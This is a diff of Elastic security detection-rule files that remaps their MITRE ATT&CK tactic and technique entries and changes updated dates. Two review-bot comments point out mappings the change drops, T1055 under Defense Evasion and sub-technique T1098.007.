@@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["azure"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -73,18 +73,26 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/kubernetes/persistence_cluster_admin_rolebinding_created.toml b/rules/integrations/kubernetes/persistence_cluster_admin_rolebinding_created.toml index fb3b3e9c302..ac83b601e4d 100644 --- a/rules/integrations/kubernetes/persistence_cluster_admin_rolebinding_created.toml +++ b/rules/integrations/kubernetes/persistence_cluster_admin_rolebinding_created.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/04" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2026/02/09" [rule] author = ["Elastic"] 
@@ -86,3 +86,21 @@ reference = "https://attack.mitre.org/techniques/T1098/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.006" +name = "Additional Container Cluster Roles" +reference = "https://attack.mitre.org/techniques/T1098/006/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/kubernetes/persistence_sensitive_role_creation_or_modification.toml b/rules/integrations/kubernetes/persistence_sensitive_role_creation_or_modification.toml index f9329ea135b..0bb148e3260 100644 --- a/rules/integrations/kubernetes/persistence_sensitive_role_creation_or_modification.toml +++ b/rules/integrations/kubernetes/persistence_sensitive_role_creation_or_modification.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/04" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2026/03/03" [rule] author = ["Elastic"] @@ -106,3 +106,21 @@ reference = "https://attack.mitre.org/techniques/T1098/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.006" +name = "Additional Container Cluster Roles" +reference = "https://attack.mitre.org/techniques/T1098/006/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" 
diff --git a/rules/integrations/kubernetes/persistence_service_account_bound_to_clusterrole.toml b/rules/integrations/kubernetes/persistence_service_account_bound_to_clusterrole.toml index a433254e859..746ad89fe61 100644 --- a/rules/integrations/kubernetes/persistence_service_account_bound_to_clusterrole.toml +++ b/rules/integrations/kubernetes/persistence_service_account_bound_to_clusterrole.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/04" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -84,3 +84,21 @@ reference = "https://attack.mitre.org/techniques/T1098/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.006" +name = "Additional Container Cluster Roles" +reference = "https://attack.mitre.org/techniques/T1098/006/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml b/rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml index 6ba483860a8..e354d1a2bfa 100644 --- a/rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml +++ b/rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/02" integration = ["o365"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2026/03/02" [rule] author = ["Elastic", "Austin Songer"] 
@@ -87,18 +87,34 @@ event.dataset:o365.audit [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/okta/initial_access_suspicious_activity_reported_by_okta_user.toml b/rules/integrations/okta/initial_access_suspicious_activity_reported_by_okta_user.toml index 5e724854e3d..3cee4601d83 100644 --- a/rules/integrations/okta/initial_access_suspicious_activity_reported_by_okta_user.toml +++ b/rules/integrations/okta/initial_access_suspicious_activity_reported_by_okta_user.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/07/02" [rule] author = ["Elastic"] 
@@ -80,13 +80,50 @@ event.dataset:okta.system and event.action:user.account.report_suspicious_activi [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/linux/persistence_at_job_creation.toml b/rules/linux/persistence_at_job_creation.toml index 40a96e3b011..c0e77855ab2 100644 --- a/rules/linux/persistence_at_job_creation.toml +++ b/rules/linux/persistence_at_job_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/31" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/12/22" [rule] author = ["Elastic"] 
@@ -133,3 +133,39 @@ reference = "https://attack.mitre.org/techniques/T1053/002/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.002" +name = "At" +reference = "https://attack.mitre.org/techniques/T1053/002/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.002" +name = "At" +reference = "https://attack.mitre.org/techniques/T1053/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/persistence_boot_file_copy.toml b/rules/linux/persistence_boot_file_copy.toml index 7b91eeff00b..291d6f8eaa7 100644 --- a/rules/linux/persistence_boot_file_copy.toml +++ b/rules/linux/persistence_boot_file_copy.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -162,3 +162,11 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_cron_job_creation.toml b/rules/linux/persistence_cron_job_creation.toml index 0ba8618d0a2..752d0925262 100644 
--- a/rules/linux/persistence_cron_job_creation.toml +++ b/rules/linux/persistence_cron_job_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/09" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/12/22" [transform] [[transform.osquery]] @@ -230,3 +230,39 @@ reference = "https://attack.mitre.org/techniques/T1053/003/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.003" +name = "Cron" +reference = "https://attack.mitre.org/techniques/T1053/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.003" +name = "Cron" +reference = "https://attack.mitre.org/techniques/T1053/003/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/persistence_systemd_service_creation.toml b/rules/linux/persistence_systemd_service_creation.toml index 73b4395f184..bce2f849d8f 100644 --- a/rules/linux/persistence_systemd_service_creation.toml +++ b/rules/linux/persistence_systemd_service_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/09" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/12/23" [transform] [[transform.osquery]] 
@@ -249,3 +249,21 @@ reference = "https://attack.mitre.org/techniques/T1543/002/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.002" +name = "Systemd Service" +reference = "https://attack.mitre.org/techniques/T1543/002/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/ml/privilege_escalation_ml_linux_anomalous_sudo_activity.toml b/rules/ml/privilege_escalation_ml_linux_anomalous_sudo_activity.toml index d02f2f59c77..c41b0d62e61 100644 --- a/rules/ml/privilege_escalation_ml_linux_anomalous_sudo_activity.toml +++ b/rules/ml/privilege_escalation_ml_linux_anomalous_sudo_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/03" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/01/15" [rule] anomaly_threshold = 75 
@@ -122,18 +122,26 @@ Sudo is a command in Unix-like systems that allows permitted users to execute co - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.""" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1548.003" -name = "Sudo and Sudo Caching" -reference = "https://attack.mitre.org/techniques/T1548/003/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/defense_evasion_injection_msbuild.toml b/rules/windows/defense_evasion_injection_msbuild.toml index eb5db75d1d3..742f00543cf 100755 --- a/rules/windows/defense_evasion_injection_msbuild.toml +++ b/rules/windows/defense_evasion_injection_msbuild.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["windows"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -76,7 +76,6 @@ process where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1055" name = "Process Injection" 
@@ -86,13 +85,27 @@ reference = "https://attack.mitre.org/techniques/T1055/" id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" - [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml b/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml index 7a8e2499e75..f7808e814e3 100644 --- a/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml +++ b/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/24" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
@@ -97,36 +97,48 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.012" name = "Image File Execution Options Injection" reference = "https://attack.mitre.org/techniques/T1546/012/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" +[[rule.threat.technique.subtechnique]] +id = "T1546.012" +name = "Image File Execution Options Injection" +reference = "https://attack.mitre.org/techniques/T1546/012/" + + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/defense_evasion_parent_process_pid_spoofing.toml b/rules/windows/defense_evasion_parent_process_pid_spoofing.toml index dde5e4ad59f..49a6b6d135d 100644 --- a/rules/windows/defense_evasion_parent_process_pid_spoofing.toml +++ b/rules/windows/defense_evasion_parent_process_pid_spoofing.toml @@ -2,7 +2,7 @@ creation_date = "2021/07/14" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/01/15" [rule] author = ["Elastic"] 
@@ -114,18 +114,36 @@ Parent Process PID Spoofing involves manipulating the parent process identifier [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" - [[rule.threat.technique.subtechnique]] id = "T1134.004" name = "Parent PID Spoofing" reference = "https://attack.mitre.org/techniques/T1134/004/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1134" +name = "Access Token Manipulation" +reference = "https://attack.mitre.org/techniques/T1134/" +[[rule.threat.technique.subtechnique]] +id = "T1134.004" +name = "Parent PID Spoofing" +reference = "https://attack.mitre.org/techniques/T1134/004/" + + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/execution_via_hidden_shell_conhost.toml b/rules/windows/execution_via_hidden_shell_conhost.toml index 1561c064fc1..df930dae4f7 100644 --- a/rules/windows/execution_via_hidden_shell_conhost.toml +++ b/rules/windows/execution_via_hidden_shell_conhost.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/17" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
@@ -107,31 +107,38 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" + [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/persistence_appcertdlls_registry.toml b/rules/windows/persistence_appcertdlls_registry.toml index 93e9f0a64a1..7cad2254650 100644 --- a/rules/windows/persistence_appcertdlls_registry.toml +++ b/rules/windows/persistence_appcertdlls_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/08/26" [rule] author = ["Elastic"] 
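Review bot: T1055 (Process Injection) is moved out of the Defense Evasion entry into a new Privilege Escalation entry, so the rule no longer reports Process Injection under Defense Evasion at all. In ATT&CK the technique sits under both tactics, and nothing visible in this hunk changes the query, so the Defense Evasion association looks like it is being lost rather than corrected; if that is unintended, keep the `[[rule.threat.technique]]` block for `T1055` in the Defense Evasion entry as well as in the new one. If the narrowing is deliberate, a short note in the commit description would help future readers.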
@@ -86,18 +86,36 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.009" name = "AppCert DLLs" reference = "https://attack.mitre.org/techniques/T1546/009/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" +[[rule.threat.technique.subtechnique]] +id = "T1546.009" +name = "AppCert DLLs" +reference = "https://attack.mitre.org/techniques/T1546/009/" + + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml b/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml index 39b2b1b7f26..078d2f2153c 100644 --- a/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml +++ b/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/15" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/09/11" [transform] [[transform.osquery]] 
@@ -161,23 +161,31 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/persistence_group_modification_by_system.toml b/rules/windows/persistence_group_modification_by_system.toml index 63402971c61..ddc052d6393 100644 --- a/rules/windows/persistence_group_modification_by_system.toml +++ b/rules/windows/persistence_group_modification_by_system.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/26" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/04/23" [rule] author = ["Elastic"] 
@@ -79,18 +79,26 @@ not group.id : "S-1-5-21-*-513" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.007" -name = "Additional Local or Domain Groups" -reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/persistence_msoffice_startup_registry.toml b/rules/windows/persistence_msoffice_startup_registry.toml index 4e5303d4933..6be85a0e79a 100644 --- a/rules/windows/persistence_msoffice_startup_registry.toml +++ b/rules/windows/persistence_msoffice_startup_registry.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/22" integration = ["endpoint", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike", "windows"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/08/26" [rule] author = ["Elastic"] 
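Review bot: The sub-technique `T1098.007` ("Additional Local or Domain Groups") is deleted from the Persistence entry and not re-added anywhere, leaving only the parent `T1098` under Persistence and the new Privilege Escalation entry. Given the rule file is about group modifications, `T1098.007` appears to be the most precise mapping the rule had, and its removal reduces coverage granularity without any visible query change. Unless the drop is deliberate, the `[[rule.threat.technique.subtechnique]]` block for `T1098.007` should be kept under `T1098` in both entries.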
@@ -88,23 +88,31 @@ registry where host.os.type == "windows" and event.action != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - [[rule.threat.technique]] id = "T1137" name = "Office Application Startup" reference = "https://attack.mitre.org/techniques/T1137/" - [[rule.threat.technique.subtechnique]] id = "T1137.002" name = "Office Test" reference = "https://attack.mitre.org/techniques/T1137/002/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/persistence_powershell_profiles.toml b/rules/windows/persistence_powershell_profiles.toml index 5e8eaf366af..419fec79e13 100644 --- a/rules/windows/persistence_powershell_profiles.toml +++ b/rules/windows/persistence_powershell_profiles.toml @@ -2,7 +2,7 @@ creation_date = "2022/10/13" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/08/26" [transform] [[transform.osquery]] 
@@ -141,18 +141,36 @@ file where host.os.type == "windows" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.013" name = "PowerShell Profile" reference = "https://attack.mitre.org/techniques/T1546/013/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" +[[rule.threat.technique.subtechnique]] +id = "T1546.013" +name = "PowerShell Profile" +reference = "https://attack.mitre.org/techniques/T1546/013/" + + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/persistence_priv_escalation_via_accessibility_features.toml b/rules/windows/persistence_priv_escalation_via_accessibility_features.toml index 630f7decf65..9cb6a3c5279 100644 --- a/rules/windows/persistence_priv_escalation_via_accessibility_features.toml +++ b/rules/windows/persistence_priv_escalation_via_accessibility_features.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "m365_defender"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/09/11" [transform] [[transform.osquery]] 
@@ -154,36 +154,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.008" name = "Accessibility Features" reference = "https://attack.mitre.org/techniques/T1546/008/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" - +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" [[rule.threat.technique.subtechnique]] -id = "T1036.003" -name = "Rename Legitimate Utilities" -reference = "https://attack.mitre.org/techniques/T1036/003/" +id = "T1546.008" +name = "Accessibility Features" +reference = "https://attack.mitre.org/techniques/T1546/008/" + + [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/persistence_suspicious_com_hijack_registry.toml b/rules/windows/persistence_suspicious_com_hijack_registry.toml index 30186fd049e..7fa5626eea9 100644 --- a/rules/windows/persistence_suspicious_com_hijack_registry.toml +++ b/rules/windows/persistence_suspicious_com_hijack_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2026/03/19" [rule] author = ["Elastic"] 
